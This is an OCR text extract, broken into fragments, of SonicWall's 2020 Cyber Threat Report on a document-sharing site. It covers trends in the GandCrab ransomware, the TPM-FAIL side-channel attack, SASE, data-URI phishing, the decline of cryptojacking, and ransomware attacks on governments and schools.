2020年Sonicwall網絡威脅報告 - SONICWALL（38頁英文版）.pdf

《2020年Sonicwall網絡威脅報告 - SONICWALL（38頁英文版）.pdf》由會員分享，可在線閱讀，更多相關《2020年Sonicwall網絡威脅報告 - SONICWALL（38頁英文版）.pdf（38頁珍藏版）》請在三個皮匠報告上搜索。

1、2020 SONICWALL CYBER THREAT REPORT I sonicwall 2 A NOTE FROM BILL CYBERCRIMINAL INC. 2019 GLOBAL CYBERATTACK TRENDS INSIDE THE SONICWALL CAPTURE LABS THREAT NETWORK KEY FINDINGS FROM 2019 SECURITY ADVANCES CRIMINAL ADVANCES FASTER IDENTIFICATION OF NEVER-BEFORE-SEEN MALWARE TOP 10 CVES EXPLOITED IN

2、2019 ADVANCEMENTS IN DEEP MEMORY INSPECTION MOMENTUM OF PERIMETER-LESS SECURITY PHISHING DOWN FOR THIRD STRAIGHT YEAR CRYPTOJACKING CRUMBLES RANSOMWARE TARGETS STATE, PROVINCIAL malicious Offi ce fi les were then leveraged later in the year. 21 ADVANCEMENTS IN DEEP MEMORY INSPECTION The above timeli

3、ne highlights changes SonicWall observed to GandCrab Version 5 in 2019, including alterations to payloads, malicious URLs, etc., even if the version number remained the same. (i.e., Version 5.2 could have different download URLs). In this snapshot, SonicWall identifi ed and logged different versions

4、 of GandCrab through the fi rst half of the year, but didnt record any attacks after May 2019 as the malware authors terminated the illegal affi liate program. Side-channel attacks continue to be ripe for security research In November 2019, four researchers from three universities Worcester Polytech

5、nic Institute (U.S.), University of Lbeck (Germany) and the University of California (U.S.) published new fi ndings that side-channel timing and lattice attacks could be executed against Trusted Platform Module (TPM) chips, specifi cally Intel fTPM and STMicroelectronics TPM chips. Dubbed TPM-FAIL,

6、this group of vulnerabilities are the next variation of side-channel attacks following Meltdown/Spectre, Foreshadow, PortSmash, MDS, etc. The details of the TPM-FAIL vulnerabilities are outlined in CVE-2019-11090. Tracking the evolution of malware strains The collective power of Capture ATP and RTDM

7、I also helps SonicWall Capture Labs threat researchers track the evolution of malware variants even when authors obfuscate their payloads, such as using scripts inside of archives. In this example, SonicWall tracked the evolution of GandCrab as it spread in the wild. The authors of the GandCrab rans

8、omware eventually announced they were shuttering the project in June 2019 after a “successful” 16-month run. 1-Jan-19 v5.0.4 17-Jan-19 v5.1 28-Jan-19 24-Feb-19 v5.1 10-Mar-19 v5.2 11-Mar-19 v5.2 12-Mar-19 v5.2 7-Apr-19 v5.2 30-May-19 v5.2 GANDCRAB RANSOMWARE V5.X TIMELINE v5.1 22 ADVANCEMENTS IN DEE

9、P MEMORY INSPECTION The latest attacks on the TPM chip shows an evolution of side-channel attacks. Unlike the fi rst-generation side-channel threats that would result in damage to the “immediate” target (i.e., the targeted data centers, cloud providers, etc.), TPM-FAIL could impact unpatched devices

10、 “down the line” everything from security appliances to end- user laptops. This exploit could be leveraged to forge digital signatures. If an operating system or the application use TPM to issue digital signatures, the private signing key used for signature generation can be compromised. With compro

11、mised signing keys, forged signatures can help criminals bypass authentication protocols, tamper with operating systems, sign malicious software, etc. SonicWall stands by its position that while these types of side-channel attacks have yet to be publicly weaponized, they continue to present a signif

12、i cant potential threat to organizations, such as cloud providers and hosting companies, running virtualized or multi-tenant environments that allow execution of arbitrary payloads. SonicWall continues to test and refi ne detection techniques in preparation for when side- channel attacks evolve from

13、 theoretical to practical. SonicWall has confi rmed that Capture Advanced Threat Protection (ATP) sandbox customers are protected from certain TPM- FAIL side-channel attacks via the solutions patent-pending Real-Time Deep Memory InspectionTM (RTDMI) technology. Vulnerability Meltdown Spectre Foresha

14、dow PortSmash Spoiler MDS (ZombieLoad, RIDL, Fallout) (CVE-2019-11090) TPM-FAIL Publicly Announced 1/3/2018 1/3/2018 8/14/2018 11/2/2018 3/5/2019 5/14/2019 11/12/2019 RTDMI Detection Confi rmed 1/30/2018 6/13/2018 8/15/2018 11/15/2018 3/5/2019 5/15/2019 1/7/2020 23 MOMENTUM OF PERIMETER-LESS SECURIT

15、Y For decades, protecting networks was entirely focused on defi ning perimeters and setting up defense layers to keep threats out. And for years, this approach served businesses well, with fi nite exposure points and attack vectors that were guarded with some investment and adherence to established

16、best practices and frameworks. Today, its a different story. The boundaries of organizations networks are borderless and expanding to limitless endpoints. Simultaneously, the threat landscape is becoming increasingly evasive. These evolving and persistent cyberattacks create boundless points of expo

17、sure to organizations. But new momentum toward perimeter-less architecture is helping redefi ne the future of cybersecurity a safer future not restrained by undefendable perimeters. Much of this new thinking was fi rst based on a zero-trust security model, which requires organizations to verify and

18、authenticate any device, user or application, regardless if it is inside or outside the network perimeter. From there, organizations could segment data across different trust zones and further vet access depending on the sensitivity of the data. But more guidance was needed to bring this theory into

19、 reality. Introduction of SASE The cybersecurity and network security solution spaces are highly segmented with an endless number offerings and vendors. This creates a massive headache for organizations trying to smoothly integrate these solutions into their network environment. Instead, the entire

20、cybersecurity space needs to converge to provide a more holistic cybersecurity approach. This is where secure access service edge (SASE), a new network security model coined by Gartner in 2019, comes into play. SASE may help shape how organizations secure their networks and data in the coming years.

21、 SASE platforms combine software- and service-based networks, which will provide a unifi cation of different security solutions. “With an endless fi eld of exposure points, the traditional network security model is outdated. With the adoption of many different cloud services, we need a more holistic

22、 approach,” said Sagi Gidali, co-founder of Perimeter 81, a SonicWall technology partner. “Designing a new way forward a future without network perimeters was the only way to properly manage and mitigate tomorrows most innovative cyberattacks.” A modern SASE platform will empower organizations to si

23、mply connect to a single platform for access to a secure network while gaining access to physical and cloud resources, regardless of their location. Some of these new solutions have a range of overlapping benefi ts, so the naming conventions do vary: zero-trust network access, secure network as a se

24、rvice, fi rewall as a service, secure SD-WAN as a service and so on. The new perimeter-less security movement could also replace the need for traditional virtual private networks (VPN) that so many employees have (begrudgingly) learned to adopt. Unlike hardware-based legacy VPN and fi rewall technol

25、ogy, the more advanced and secure zero-trust network as a service offerings use the software-defi ned perimeter (SDP) model to offer greater network visibility, seamless onboarding and full compatibility with all major cloud providers. With an endless fi eld of exposure points, the traditional netwo

26、rk security model is outdated Designing a new way forward a future without network perimeters was the only way to properly manage and mitigate tomorrows most innovative cyberattacks. Sagi Gidali Co-Founder Perimeter 81 “ ” 24 PHISHING DOWN FOR THIRD STRAIGHT YEAR Mirroring how malware is being lever

27、aged, cybercriminals are being more targeted with phishing than ever before, too. So much so, SonicWall Capture Labs threat researchers recorded a 42% decline in overall phishing volume, the third straight year the attack vector declined. Also like malware, volume is only part of the story. Phishers

28、 are being measured, pragmatic and patient. Besides the usual phishing campaigns that attempt to steal login credentials, SonicWall observed new practices using old tricks. One such example is the use of HTML fi les leveraging legacy data uniform resource identifi er (URI) methods other than JavaScr

29、ipt, which upon rendition displays a fraudulent webpage or form to the victim to illegally obtain usernames and/or passwords from unsuspecting victims. Employees across a range of organizations, including educational, banking, computer, government, airlines, agriculture, travel, machinery, construct

30、ion, among others, are often the target of this prevalent phishing tactic. As was covered in a previous section, PDFs and Microsoft Offi ce fi les are the delivery vehicles of choice for the modern cybercriminal. Unfortunately, these fi les are universally trusted and abundant in the modern workplac

31、e. Threat actors are hoping this trust, coupled with busy work schedules, is enough to trick unsuspecting victims into clicking links or downloading attachments included within phishing emails. In many situations, this click is the only barrier preventing the delivery of the cybercriminals payload.

32、Old tricks are new again. The example above, found in 2019, shows how data URI methods can be leveraged to present target victims with fraudulent web pages or forms to steal user credentials. 25 CRYPTOJACKING CRUMBLES The shuttering of the Coinhive mining operation in March 2019 dealt a devasting bl

33、ow to the nefarious cryptojacking racket that abused the service. Coinhive was not inherently malicious; it was an alternative method for websites to earn revenue instead of showing advertisements. Coinhive- enabled websites allocated a small portion of visitors processing power to legitimately mine

34、 cryptocurrency. Unfortunately, attackers misused this technology by infecting a large number of websites with Coinhive scripts and used the processing power of unsuspecting victims to mine cryptocurrency for themselves (without users knowledge). The cryptocurrency of choice was usually Monero. Whil

35、e the ebb and fl ow of cryptocurrency prices didnt help encourage authors to write new cryptojacking malware, the loss of Coinhive was too much for the malicious movement to overcome. In fact, bitcoin even made a surge halfway through 2019 to help cryptojacking stay relevant as a lucrative option fo

36、r cybercriminals. 78% After the shuttering of Coinhive, the volume of cryptojacking hits dropped 78% during the second half of 2019. 26 CRYPTOJACKING CRUMBLES But crypto prices slumped again in late 2019 and remnant Coinhive malware faded with it. XMRig and Bitminer were the primary cryptojacking ma

37、lware remaining, but their collective volume was a fraction of Coinhive. To put the decline in perspective, SonicWall reported that total cryptojacking hits reached 52.5 million for the fi rst six months of 2019. Despite a late surge in December (expected seasonal attack spike), the malware fi nishe

38、d with 64.1 million total hits in 2019, a 78% drop since the start of July 2019. 27 RANSOMWARE TARGETS STATE, PROVINCIAL & LOCAL GOVERNMENTS In 2019, there was an increase in ransomware used in targeted attacks toward state, provincial and local governments, as well as large corporations. Attacks ha

39、ve ranged from hospitals, police stations and educational institutions to aluminum factories (Norsk Hydro, Norway) and power grids (City Power, Johannesburg). “In a modern, citizen-centric environment, successful ransomware attacks are highly disruptive,” SonicWall President and CEO Bill Conner wrot

40、e for Forbes. “Networks from city hall, law enforcement agencies, sanitation, courthouses or the DMV could be compromised in minutes and everyday operations held for ransom, often at exorbitant costs.” Following the same trend as global malware volume, ransomware attacks were down slightly in 2019.

41、SonicWall Capture Labs threat researchers recorded 187.9 million in total ransomware volume for the year, a 6% drop from the record- breaking 2018 volume. 28 RANSOMWARE TARGETS STATE, PROVINCIAL & LOCAL GOVERNMENTS Bill Conner President & CEO SonicWall Schools under siege by ransomware K-12 district

42、s and higher education institutions across the world were also targeted with ransomware in 2019. And its very much a global epidemic. In the U.S., ransomware attacks took down schools across the country, from New York, New Jersey, Louisiana and Oklahoma to California and back again. In some cases, l

43、ike Livingston Public Schools in New Jersey, classes were delayed because of ransomware infection. That attack even took down the districts payroll system. Similar delays were felt by districts in Michigan, Alabama and New York. In the U.K., penetration testing conducted by JISC, the government agen

44、cy that provides many computerized services to U.K. academic bodies, tested the defenses of over 50 British universities. The results were unfl attering: the pen testers scored a 100% success rate, gaining access to every single system they tested. Defense systems were bypassed in as little as an ho

45、ur in some cases, with the ethical hackers easily able to gain access to information such as research data, fi nancial systems as well as staff and student personal information. But volume shouldnt be confused with effectiveness. Cybercriminal organizations that leverage ransomware continue to focus

46、 on the quality of their attacks over sheer quantity. Its no longer the size of the organization, but rather their likeliness to pay. Unfortunately, in 2019 that meant a number of highprofi le attacks against various state, provincial and local governments. More than 140 state and local governments

47、are reported to have been hit with ransomware in 2019, although the actual number is likely much higher. Another study stated that ransomware infected some 621 schools and hospitals through September 2019. The year saw ransomware attacks across the U.S. bring city services to a halt, including those

48、 in Arizona, Florida, Georgia, Indiana, Maryland, Nevada, New York, Texas and more. Larger organizations remain the most lucrative targets as they are more likely to pay higher sums of money for data restoration compared to the average end-user. Bitcoin remains the dominant currency for ransom payme

49、nts because of its anonymity (when used correctly). In a modern, citizen-centric environment, successful ransomware attacks are highly disruptive. Networks from city hall, law enforcement agencies, sanitation, courthouses or the DMV could be compromised in minutes and everyday operations held for ransom, often at exorbitant costs “ ” 29 RANSOMWARE TARGETS STATE, PROVINCIAL & LOCAL GOVERNMENTS In Australia, the head of the local intelligence agency was recruited to inform universities about